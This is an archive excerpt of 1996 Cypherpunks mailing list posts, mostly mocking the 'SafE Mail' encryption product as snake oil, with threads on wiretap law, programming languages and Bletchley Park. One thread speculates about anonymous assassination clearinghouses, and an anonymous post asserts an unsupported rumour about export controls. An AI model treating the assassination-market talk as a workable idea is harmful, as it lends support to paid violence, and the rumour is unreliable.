                   |                             |
 Electronic        | Yes                         | Yes
 Signature         |                             |
                   |                             |
 Public Key        | Yes                         | Yes
 Distribution      |                             |
                   |                             |
 Length of Public  | 22 characters only          | Over 1200 characters
 Key               |                               | can distribute on the 
                   |                             | diskettes only
                   |                             |
 Integrity Checking| Yes                         | Yes
                   |                             |
 Error Correction  | 9 different levels, selected| None Available
                   | by user.                    |
                   |                             |
 Best Attack       | No known way                | Statistical
                   |                             | Analysis
                   |                             |

[ Where to begin?  I wonder if it's their DOS or Windows version that runs
on the 33MHz SparcStation?  Oh, and I love the "no known way" to attack them. ]

--

What are the trade magazines saying about SafE Mail(tm)?  Well, this is from
that traditional bastion of reporting integrity, the Carolina Computer News,
June 1995:  http://www.sfmc.com/scop02.html

" ...SafE Mail(tm) is designed to be a powerfull business and personal
communications tool, ideal for public or private network communications.
SafE Mail(tm) provides the least expensive, fastest, INTERNET compatible,
secure file transmission on the ma rket today. SafE Mail(tm) has a unique
encryption algorithm.
It's encryption key is longer than any other similar product currently
available on the market today. The user can define the distortion/error
correction level which determines the length of the encryption key. The
longer the key length, the more difficult it is to break. SafE Mail(tm) employs
the Public Key Distribution algorithm. Unlike currently available encryption
algorithms (DES,RSA), SafE Mail(tm) generates a unique 22 character public key
for each user. Des has no public key generator and the RSA Public Key
becomes larger (up to several kilobytes) as the number of recipients
increase. SafE Mail(tm) error correction is capable of restoring a binary file
having 15% distortion errors or an ASCII file with 30% errors. SafE Mail(tm)
excellent compression capability allows an ASCII file to be deflated by
almost 85%!... " 

[ If you read the quotes from the various magazines, you probably won't be
surprised at the list of quality magazine names that have been taken in by
these hucksters:  Byte, PC Week, PC Today, and others. ]

--

However, it gets even better than this.  The capstone (if you'll pardon the
pun) of these folks is their contest, described at http://www.sfmc.com/cont.html
If you can break their security, you'll win FIVE FREE COPIES of SafE Mail(tm)!
Gosh, how can we pass up such an opportunity?

-j, ROTFLOL  :-)
--
J. Deters
>From Senator C. Burns' Pro-CODE bill, which I support and you can find at:
http://www.senate.gov/member/mt/burns/general/billtext.htm
"  (2) Miniaturization, disturbed computing, and reduced transmission
 costs make communication via electronic networks a reality."
+---------------------------------------------------------+
| NET:     jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:    1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)     |
| PGP Key ID:  768 / 15FFA875                             |
+---------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 18 Jun 1996 19:31:41 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: "Termination"?
In-Reply-To: <199606180422.VAA03104@mail.pacifier.com>
Message-ID: <199606180432.XAA25307@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:
> 
> At 07:54 PM 6/17/96 -0400, s1113645@tesla.cc.uottawa.ca wrote:
> >
> >
> >On Sat, 8 Jun 1996 ichudov@algebra.com wrote:
> >
> >> Since corrupt officials are likely to have more anonymous cash that
> >> phreedom phighters, guess who will win.
> 
> Remember, Chudov was wrong about this.  It's not just the amount of money 
> you have, it's whether you can identify people as your "enemies."

Well, why. If I were a corrupt politician, I'd start with exterminating
all posters to Cypherpunks, starting with you (with exception of a
couple of people). 

As a Russian, I can see that you lack the feeling of proper scale when
you think about exterminations. This is forgivable since you have never
seen them. There is no need to exercise any discretion or even fairness
if you have enough cash and a good assassination clearinghouse.

I'd also set up a number of fake clearinghouses and assassinate those
who provide *your* clearinghouse with anonymous services (if your 
clearinghouse is run anonymously).

> >I still think assassination politics is self-terminating.
> 
> It would probably be more accurate to say that it is "self-limiting."  

I think that it is a fine idea and a neat experiment (Russians love
such experiments, you know), but it will go way farther than you think.

Again, many governments would appreciate the nice opportunity to reach 
their political goals by assassination means.

> Think back to integral calculus, where the area under an infinitely long 
> curve may be finite.  If we think of X as being time, and the rate of deaths 
> as the height of the curve above Y=0, the total number of deaths is 
> reflected in the area.  Some death rate schedules will integrate to a 
> finite, limited number of deaths.  Even if reality doesn't quite approach 
> this optimum situation, it MAY approach a much better reality where the 
> eventual rate of deaths is far lower than the status quo.

There are some interesting people who do not like spending hard earned
$$ on clothes, heated water pools, and Bentleys. They'd rather prefer
the fun of seeing their neighbors disappear and their families terrified.

Number of such people won't really decline over time.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 18 Jun 1996 20:55:40 +0800
To: cypherpunks@toad.com
Subject: "Mail Exploders"
Message-ID: <adeb9d950202100490f8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:23 PM 6/17/96, Lucky Green wrote:
>At 9:45 6/17/96, Duncan Frissell wrote:
>>At 08:43 AM 6/17/96 -0400, Declan B. McCullagh wrote:
>>
>>>I believe we used the term "email exploder" instead of "mailing list,"
>>>particularly in cross-examination and closing arguments, to convey the
>>>idea that such a device is often used for conversation, not just one-way
>>>communication.
>>
>>Was this term invented during the hearings or has anyone heard of it before?
>
>I have heard of it before. I believe "mail exploder" is a rather old term.

I haven't heard the term in many a year, but it fits with the "Internet =
explosives instructions" slant in popular opinion.

"Those nerds are getting their revenge by developing "mail exploders" and
spreading mayhem across the Net."

I wonder where they got their technical information?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Tue, 18 Jun 1996 19:27:55 +0800
To: cypherpunks@toad.com
Subject: [Noise] Re: Java
Message-ID: <v02140b00adec16f3c650@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain



s1113645@tesla.cc.uottawa.ca writes:
> [...](One thing that detractors of
> Smalltalk claim is that it is slow--slower than Java. However there is a
> research dialect from Sun called Self which is supposed to be 50% as fast
> as C.)

Self also give a new meaning to phrase "code bloat."  A 'Hello, world!'
that requires more than a megabyte kind of kills any enthusiasm one might
or a language which otherwise takes a neat slant message passing...
[Although I gave up before version 4.0 so maybe things have gotten better]

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 18 Jun 1996 19:52:15 +0800
To: cypherpunks@toad.com
Subject: Re: SafE Mail Corporation
Message-ID: <v02120d56adec0a567ae3@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:21 6/17/96, M.Wagoner (1 wrote:
>We would like someone to be able or should I say try and crack our
>encryption. IT IS IMPOSSIBLE.

Sigh. Yet another one...

Unless you make source code available, you will be at best ignored, and at
worst sued by users of your product should they discover that your
unbreakable encryption isn't so unbreakable after all. Unless you use a
hardware RNG and OTPs, your statement that it is impossible to break your
encryption software is simply false. Do not expect that individuals who do
have clue are going to waste their time on trying to break an encryption
scheme invented by someone that so obviously doesn't know what he is doing.

Go back to bed.



-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
   Disclaimer: My opinions are my own.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 18 Jun 1996 18:25:13 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Royalties (was "Re: Micropayments are Crap", which is a boring s
Message-ID: <199606180545.BAA03098@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 17 Jun 96 at 12:45, Vladimir Z. Nuri wrote:

[..]
> 2. copyrights. the issue of copyrights is not even resolved today.
> when serious cash starts to be associated with cyberspace you
> are going to see a lot of incredibly agitated people, especially
> lawyers. I imagine systems will evolve that are similar to 
> a technology that has evolved by which radio stations pay music
> companies whenever they play artists songs. (if any cpunks could
> elaborate on this system, I think it is an excellent preliminary
> example of how a microcurrency-like system would interact with
> a copyright situation).  I think similar standards are going to

Excellent example? I dunno. At the non-commercial station I work, 
once a year or every other year ASCAP or BMI, for a two week period, 
wants our playlists... not the usual playlists, but detailed ones 
which even the most anal-retentive people hate to fill out: the 
performer, the song writer (not always the same), album and song 
titles, record label, and if music is ASCAP, BMI, etc.  Includes not 
only songs but them music, background music, etc.

I don't remember the rates, but non-commercial stations pay a lower rate than 
commercial ones.  Royalties are supposedly divied out to songwriters 
(and performers?) or record companies based on how much airplay they 
received, which I guess is averaged out for the whole year.  I don't 
know if they survey all radio stations around the same time or space 
it out for different areas and different stations throughout the 
year.  Touch luck for artists who get some airplay but not enough to 
make it on the lists, of course.

Digital area: possibility that people will feel because it's 
computerized, EVERYTHING can be kept track of.    This is 
problematic, aside from privacy reasons, because the big royalty 
makers get less and the smaller people get more.  Parallel with 
experiemtal Nielson-ratings tech... a special cable box that did the 
monitoring for you, and even had an electronic eye that could tell if 
anyone was in the room, or if they were sleeping or reading the paper 
rather than watching... apparently every station got much lower 
ratings than when people generously filled out booklets, so the 
stations threatened to set up an alternate system, so I don't know if 
that system was adopted.

I'm curious as to how royalities are divied up from the cassette tax, 
since everyone with blank casssettes is, of course, violating 
copyrights according to some logic.

Will people want royalities for reselling?  There was a flack a few 
years ago from some big record distributors over used CD sales.  They 
refused to supply some of the big chains if they continued to sell 
used CDs without giving them a cut.

Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 18 Jun 1996 18:19:25 +0800
To: "M.Wagoner (1)" <safemail@ntrnet.net>
Subject: Re: SafE Mail Corporation
In-Reply-To: <199606172121.RAA00883@ns1.ntrnet.net>
Message-ID: <Pine.SUN.3.93.960618020516.20947A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 17 Jun 1996, M.Wagoner (1) wrote:

> We would like someone to be able or should I say try and crack our
> encryption. IT IS IMPOSSIBLE.

With the above you have saved me the trouble of even trying.

Your appraoch to cryptography betrays such ignorance that nothing which
your "corporation" produces could be of the slightest redeeming value.

(Bloody snake oil venders)

Now go away.

> 
> Our Web site is http://www.sfmc.com  Phone number is 1-800-252-9938.
> 

Clearly a waste of good storage space.

> 
> Randy Estridge
> SafE Mail Corporation  
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 18 Jun 1996 18:54:31 +0800
To: cypherpunks@toad.com
Subject: Re: SafE Mail Corporation
Message-ID: <199606180613.CAA15373@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


What the heck: I'm bored tonight...

Well, not that bored.  Don't need another 'tear snake-oil to bits or 
is this a damned troll' thread.  Why does "M. Wagoner" sound 
familiar?

On 17 Jun 96 at 17:21, "M.Wagoner" (safemail@ntrnet.net) wrote:

> We would like someone to be able or should I say try and crack our
> encryption. IT IS IMPOSSIBLE.
> 
> Our Web site is http://www.sfmc.com  Phone number is 1-800-252-9938.
> 
> Randy Estridge
> SafE Mail Corporation  

Uh oh. I checked the page.  Claimed Public Key, Sigs, Error 
Correction, Compression, lots of nice stuff.   They kind of got the 
vocabulary down. Only in a fuzzy way. Hypes "INTERNET Compatible" is 
if that means anything, a "22 character public key" (no, it's not a 
type.  twenty-two character public key, in several places said that), 
proprietary algorithm, etc. etc.

Yawn,

Rob.

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 18 Jun 1996 19:15:41 +0800
To: Ernest Hua <hua@XENON.chromatic.com>
Subject: Re: You bet they have/are: NSA/CIA to snoop INSIDE the U.S.???
In-Reply-To: <199606172205.PAA06449@server1.chromatic.com>
Message-ID: <Pine.SUN.3.93.960618020945.20947B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 17 Jun 1996, Ernest Hua wrote:

> > anyone who believes the FBI and a host of other U.S. agencies even 
> > less scrupulous does not wiretap without permits, has been standing behind 
> > the door. generally, it does not matter if the information learned is 
> > admissable in court  --they never admit wiretapping in the first place as  
> > the agency themselves, in many cases, *did*not*wiretap*  --but the agency 
> > does buy info from usually unsavory "contractors" who do wiretap.
> 
> Here is where I'm totally amazed (aghast ... maybe I'm just too naive):
> (And, yes, I have asked this question, in different words, to a lawyer
> crowd.)
> 
> It is clear that if the FBI/CIA/NSA/ATF/DoS intercepts a message with
> some very important content, like, say, I (Ernest Hua) was plotting to
> kill Hillary, then they can use that information to start investigating
> my activities, even if the intercept turned out to be illegal.  Those
> who saw the content of this intercept is not required by law to "forget"
> that they ever saw it.

If they intend to prosecute in a U.S. court they are.

Which crowd of lawyers was this?  Must have been after open bar.

Look it up, the doctrine is called "fruit of the poisonous tree."

In your example, the evidence would be refered to the FBI or the Secret
Service, or more likely both provided the intercept clerk's superior
wanted to even expose the existance of the intercept program to begin
with- unlikely in my experience.  From there, it being fairly clear that
the intercept was illegal to the FBI / Secret Service, they may visit and
see if they can dig up a plausible explanation as to how they "really" got
interested in your activities, but refering to the intercept is right out.

See e.g., United States v. United States District Court (Keith), 407 U.S.
297 (1972); Alderman v. United States, 394 U.S. 165 (1969).

Warantless surveillance can only be used in criminal prosecutions where
the "primary purpose" of the surveillance is intelligence.  United States
v. Megahey, 553 F.Supp. 1180, 1189-1190 (E.D.N.Y. 1982).

That evidence will have to survive a hearing on exclusion.  Highly
unlikely if you were accidently overheard.

Judges are protective of their jurisdiction.

> 
> Ern
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 18 Jun 1996 18:48:51 +0800
To: John Young <jya@pipeline.com>
Subject: Re: The Ultima Spy Book
In-Reply-To: <199606171540.PAA14807@pipe3.ny3.usa.pipeline.com>
Message-ID: <Pine.SUN.3.93.960618023421.20947C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 17 Jun 1996, John Young wrote:

>    The Ultimate Spy Book 
>    by H. Keith Melton 
>    (Dorling Kindersley, London) 
>    DK Publishing, New York 
>    First American edition, 1996. $29.95. 
>    ISBN 0-7894-0443-5 
>  
>    Over 600 illustrations of the tools and tricks of spycraft 
>    for killing, betraying, deceiving, surveilling, encrypting, 
>    decrypting, communicating, burgling, recruitment and 
>    training, fucking up and rotting in jail, and flacking spy 
>    fluff until tip-canoe-ed. 


Most of which is 25-30 years out of date.  The remainder is either 5-10
years out of date, or so simple to be useful despite being anything but a
secret anymore.

Still cool for the history buff.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Tue, 18 Jun 1996 16:52:39 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: SafE Mail Corporation
In-Reply-To: <2.2.32.19960618002536.007510d8@popmail.crl.com>
Message-ID: <Pine.SUN.3.94.960618032754.22996A-100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 17 Jun 1996, Sandy Sandfort wrote:

	<< Somebody else wrote the first two lines >> 

> >We would like someone to be able or should I say try and 
> >crack our encryption. IT IS IMPOSSIBLE.

	With a 22 character public key
	One way hash function 
	50 Kb/second encryption  

> "Attention `Hackers'" they said if you crack their 
> unbreakable SafE Mail code, you get 5 free copies of ...

	I didn't get that far -- the above lines convinced
	me that it was hype.  
	
	Especially their errors about PGP --- if they can't quote
	their competition correctly, I can only assume that their own
	data about their program is equally misrepresented.  

> SafE Mail!  Oh, that's a really primo prize, broken 

	The free demo costs $40.00 for shipping and handling
	+ sales tax.   << Wish I could remember the exact wording
	of the statute that states what reasonable shipping and
	handling charges are -- I suspect this exceeds them. >> 

> Since cracking their encryption is IMPOSSIBLE, I suggest 
> they make the stakes interesting--$100,000, or hell, a cool
> million.  After all, it's unbreakable.  It's not like they

	An insurance policy from Lloyds of London will 
	probably cost them less than that, and will pay out
	more than that , when they do pay it out.

        xan

        jonathon
        grafolog@netcom.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Tue, 18 Jun 1996 22:50:32 +0800
To: Cyperpunks Mailing List <cypherpunks@toad.com>
Subject: Re: alpha.c2.org in deep shit?
In-Reply-To: <2.2.16.19960617134123.4e17463c@mail.solutions.net>
Message-ID: <Pine.NEB.3.93.960618053739.15150C-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 17 Jun 1996 sdudar@solutions.net wrote:

> Huh?
> 
> 
> At 06:14 PM 6/16/96 -0500, you wrote:
> >-----BEGIN PGP MESSAGE-----
> >Version: 2.6.2
> >
> >hIwDSReYoIbc3PkBA/9xblBrrofx89t5QoJVwCyGB/+futdCXEolwcsQdwWGcDtc
> >7Vn7orCB8v6iQO+sCgAlYf38ftUxGmzebDd/7eWodTGx8XKnzBIZ9E6bRS38XLRa


Give it a rest willya?? I hit a bad keystroke sequence. That's all. It's a
mistake. Please don't turn this into the never-ending thread. Sheesh!

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcaHWFOTpEThrthvAQEFcQP/WZ+EeM8MdJzUTtJMO8Cs1B42zyZA7NVH
9Gd47ITEni4lB+ARGRD18CyBHpFJnyWuTQETVzfV53XXkc7tKZJCMQeuGWdayinQ
euy/badMgHU5vly+eA3gFbO+anlBoM4ml/8VQ8uVjbW1SHjJW53VO2MZ8aqTRl5i
K9HPk/7iEvg=
=Qohf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 19 Jun 1996 01:46:50 +0800
To: cypherpunks@toad.com
Subject: test
Message-ID: <199606181316.GAA01816@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


In approximately 2 weeks the export controls on strong cryptography
will be lifted.  Not sure about escrow provisions.

You heard it here first.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 18 Jun 1996 18:33:00 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: [Noise] Re: Java
In-Reply-To: <Pine.3.89.9606171924.B20059-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.PCW.3.94.960618071727.2111A-100000@CISPPP>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 17 Jun 1996 s1113645@tesla.cc.uottawa.ca wrote:
> 
> helped too (something more substantial than the windowing primitives it
> comes with). Java has all these things. (One thing that detractors of
> Smalltalk claim is that it is slow--slower than Java. However there is a
> research dialect from Sun called Self which is supposed to be 50% as fast
> as C.)

Smalltalk was in fact the first object oriented language to ever be
tweaked enough to be useful (smalltalk-80 is where JIT came from). 

Self is a completely different kettle of ball-games; it's older than java,
and based on a totally different conception of OOP. The only major 
language Ican think of that's from the same family is newton script. Self
does away with the concept of classes, and instead uses prototypes to
inherit from. The main design principle seems to have been: create a
language that's as slow as possible, then see how well you can optimise it
:)

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Crocker <dcrocker@brandenburg.com>
Date: Wed, 19 Jun 1996 05:43:08 +0800
To: Greg Kucharo <sophi@best.com>
Subject: Re: Netscape Mail Security and PGP Plugins
In-Reply-To: <31C39529.133B6630@best.com>
Message-ID: <v03007434adec7c817a36@[205.214.160.97]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:01 PM -0700 6/15/96, Greg Kucharo wrote:
>There hasn't been a lot of discussion on this list about the future
>of secure e-mail via Netscape. The most i've seen has come from

	Folks might also want to look at the notes and discussion that took
place, surrounding the February workshop put on by the Internet Mail
Consortium.  Check out the appropriate links under <http://www.imc.org>.

	This, of course, has nothing specific to netscape since it's
browser appears as nothing more than one more Internet mail user agent.

d/

--------------------
Dave Crocker                                            +1 408 246 8253
Brandenburg Consulting                             fax: +1 408 249 6205
675 Spruce Dr.                                 dcrocker@brandenburg.com
Sunnyvale CA 94086 USA                       http://www.brandenburg.com

Internet Mail Consortium               http://www.imc.org, info@imc.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Wed, 19 Jun 1996 03:17:29 +0800
To: cypherpunks@toad.com
Subject: Snake_Oil_punks was Re: SafE Mail Corporation
Message-ID: <199606181340.IAA24761@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


Talked with Randy of Safe Mail Corporation on the phone.  

Among the stuff he claimed was that

        PGP has the secret key in its public key!

        Found out that not only does this algorithm use 22 characters.  
        The characters are the ones only found on the keyboard.

        SafeMail uses a proprietary Russian algorithm.

        
Not only is this company misquoting it's making up as it goes along. :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 19 Jun 1996 08:27:36 +0800
To: cypherpunks@toad.com
Subject: Time (of CyberPorn fame) puts up a nice CDA page; commentary from PED
Message-ID: <Pine.GUL.3.93.960618101613.19977B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Netly-L is the mailing list that goes with www.netlynews.com. The traffic is
quite low, and occasionally something entertaining comes by.

-rich

---------- Forwarded message ---------- 
Date: Tue, 18 Jun 1996 05:58:20 -0400   
From: Philip Elmer-DeWitt <ped@well.com>
Reply-To: netly-l@pathfinder.com
To: Multiple recipients of list <netly-l@relay.pathfinder.com>
Subject: Re: So...

Chris, a couple of omissions in your very good techwatch CDA extravaganza
(http://pathfinder.com/technology/netdecency/)

1) the screening software sidebar in this week's TIME (preferably with live
pointers)
2) John Perry Barlow's TIME essay from late 1995 (search TIME for "this
bill is full of shit")

I could argue the omission of the "cyberporn" cover round or flat.


Philip Elmer-DeWitt                                             ped@well.com
TIME Magazine        ped@cis.compuserve.com        philiped@aol.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Wed, 19 Jun 1996 06:02:15 +0800
To: TM Peters <tmpeters@calvanet.calvacom.fr>
Subject: Re: Federal key registration agency
In-Reply-To: <199606181427.QAA10162@ns.calvacom.fr>
Message-ID: <31C6C938.3CFD@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


> Compuserve Online Today Daily Edition, 15 June 1996:
> 
> Attorney General Janet Reno ... said her plan would require people to
> register with the new agency the secret codes -- or "keys" -- they use 
> to encrypt messages online.

This would be the "Bad Cop" line, for those playing along at home.

[ "Gosh, can't you help us VP Al Gore?" the people beg.  "Well, I'll
  see what I can do, but Reno is really mean and nasty.  I'll try to
  reason with her though.  Wish me luck." ]

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 19 Jun 1996 04:15:41 +0800
To: Scott Schryvers <schryver@radiks.net>
Subject: Re: Snake_Oil_punks was Re: SafE Mail Corporation
In-Reply-To: <199606181340.IAA24761@sr.radiks.net>
Message-ID: <199606181421.KAA28339@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Talked with Randy of Safe Mail Corporation on the phone.  
>         PGP has the secret key in its public key!

Huh?  Can you explain what this means?  I'd sure like to know.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Wed, 19 Jun 1996 05:42:09 +0800
To: cypherpunks@toad.com
Subject: Whats new at Bletchley Park
Message-ID: <9606181455.AA04450@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


Greetings;

I have just returned from spending a week at Bletchley Park, and have the following 
to report:

On Thursday, 6 June, we had the official switch-on of the rebuilt Colossus. 
There is still a lot of work to be done on Colossus, but that which is there 
is definitely working.  What remains is to fill in the holes to expand it to 
the full five wide system that was the Mark-II machine.

The switch-on was accompanied by a reasonable sized media affair with many 
of the original Colossus users present.  Also in attendance was Tommy Flowers, 
the designer of the original, along with his wife and son.  It was the first 
time that his wife had seen or even heard a lot about Colossus. Dr. Flowers, 
now in his nineties, has a wonderful memory and is a first class gentleman. 
It was a real pleasure to spend some time with him. There was a lot of local 
media coverage, but as yet I have seen nothing in international media, such as 
The (London) Times or the Financial Times, both of whom were represented at the 
switch-on.


During this time, I also installed a new Sun Netra-I server at BP.  This server 
was most kindly donated by Sun Micro Systems.   Many thanks to Scott, who set 
the direction for this gift, and to Matthew, Michael and Steven at Sun-UK for 
all their efforts in making this happen.

A four GByte disk farm was also donated by BoxHill Systems.  Thanks to Carol, 
Ben, Philip, etal at BoxHill for this contribution.

This server will provide Internet and WWW access to BP and will serve as the 
BP mailhost.  Once we have the communications facilities in place, the server, 
elgar, will be on-line.  I'll keep the net informed re: our progress in that 
direction.

Once on-line, Tony Sale has a lot of very cool  ideas for web pages, including 
an interactive, GUI-based  Enigma emulation.  Tony and James Bristow also plan 
to move their existing Web pages to elgar.

The plans to make BP into a one-of-a-kind museum are well underway.  Many 
improvements and added facilities have been added since I was there in April, 
including a nice bar and restaurant in the original Hut Four.  Again I will 
keep the net up-to-date until the Web server is generally available.  

I strongly urge everyone who has the opportunity to visit BP to do so.  At 
this point they are open every other weekend, but will, at some point in the 
future, improve on that. 

If you have any questions, e-mail me, or for 'open weekend status' call BP 
directly at: (011 44) 1 908 640404.

Many thanks to my friends and colleagues at Bletchley Park; Roger, Peter, Tony, 
Harry, Margaret, etc, for their hospitality and kindness.


	-paul (pjb@23kgroup.com)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 19 Jun 1996 09:37:12 +0800
To: cypherpunks@toad.com
Subject: Re: SafE Mail Corporation
Message-ID: <199606181804.LAA13022@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:55 AM 6/18/96 -0700, Lucky Green wrote:
>At 17:21 6/17/96, M.Wagoner (1 wrote:
>>We would like someone to be able or should I say try and crack our
>>encryption. IT IS IMPOSSIBLE.
>
>Sigh. Yet another one...
>
>Unless you make source code available, you will be at best ignored, and at
>worst sued by users of your product should they discover that your
>unbreakable encryption isn't so unbreakable after all. Unless you use a
>hardware RNG and OTPs, your statement that it is impossible to break your
>encryption software is simply false

Don't even assume that hardware RNGs and OTPs by themselves make a system
unbreakable.  Go see NSA's web site on the Verona intercepts to see what
people who know what they are doing can do when users slip up using a OTP
system.  http://www.nsa.gov:8080/

I'm with Lucky (and many others) 100% on this one.  Snake Oil.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Wed, 19 Jun 1996 05:44:34 +0800
To: Norman Hardy <norm@netcom.com>
Subject: Re: Class III InfoWar: TST Article
In-Reply-To: <ade632bf01021004d335@DialupEudora>
Message-ID: <Pine.LNX.3.91.960618111220.32248C-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


    What are the effects of an EMP on the persons releasing the bomb 
,those in te vacinity and what is the distance that the bomb has a 
physical effect on people. Also ,is there any knowledge of reusable EMP 
bombs yet?
                              TIA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Wed, 19 Jun 1996 09:13:59 +0800
To: perry@piermont.com
Subject: Re: Remailer Operator Liability?
In-Reply-To: <199606171703.NAA19819@jekyll.piermont.com>
Message-ID: <m2ybllm0cn.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Perry" == Perry E Metzger <perry@piermont.com> writes:

Perry> Duncan Frissell writes:
